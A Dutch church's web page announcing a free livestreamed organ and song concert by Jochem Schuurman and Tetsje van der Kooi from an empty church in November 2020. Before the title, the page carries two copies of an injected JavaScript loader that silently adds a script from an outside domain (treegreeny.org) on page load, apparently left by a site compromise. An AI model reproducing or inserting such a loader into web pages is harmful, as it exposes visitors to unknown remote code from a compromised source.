;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Orgelconcert en zang in lege kerk-luistert u mee? - PKN Damwâld

Orgelconcert en zang in lege kerk-luistert u mee?

Gepubliceerd op: woensdag 7 oktober 2020

Al enkele jaren organiseert de muziekcommissie van de Ontmoeting in het najaar een orgelconcert. Door alle onzekerheden rondom het coronavirus rees de vraag of dat dit najaar wel mogelijk was, en hoe dat concert dan vormgegeven zou moeten worden. Want dát het concert gewoon gehouden moest worden, dat stond voor de muziekcommissie buiten kijf. “We willen mensen een avond ontspanning bieden. Als dat niet middels een avond in de kerk kan, dan maar ontspanning thuis”. De kerk heeft de afgelopen periode flink geïnvesteerd in digitale middelen waardoor het mogelijk is om het concert live te streamen. Een unieke manier om dit thuis te beleven.

Op zaterdagavond 7 november zullen organist Jochem Schuurman en zangeres Tetsje van der Kooi optreden in een lege kerk. Voor hen is dat niet een geheel nieuwe ervaring; de gerenommeerde musici speelden tijdens de intelligente lockdown iedere zondag vanuit de Martinikerk in Franeker, wat tevens live werd uitgezonden voor het thuiszittende publiek.

De musici – Schuurman is vaste organist van de Martinikerk te Franeker en Van der Kooi zong ooit voor het koningspaar – gaven reeds vele concerten in zowel binnen- als buitenland. Samen zorgen ze voor een prachtig avondvullend programma met muziek van Bach en Händel, spirituals (Godsdienstig Amerikaanse liederen), liederen van Mozart en Brahms en nog veel meer.

De muziekcommissie wil u dit graag aanbieden en nodigt u van harte uit om zaterdag 7 november thuis vanachter de computer, tablet of laptop mee te genieten van dit programma.

Het livestreamconcert is te beluisteren vanaf 19.30 uur via www.pkndamwald.nl/live en via Kabelnoord kanaal (1)956. Het concert is gratis te beluisteren, maar een vrijwillige bijdrage wordt op prijs gesteld. Meer informatie hierover wordt tijdens de uitzending toegelicht.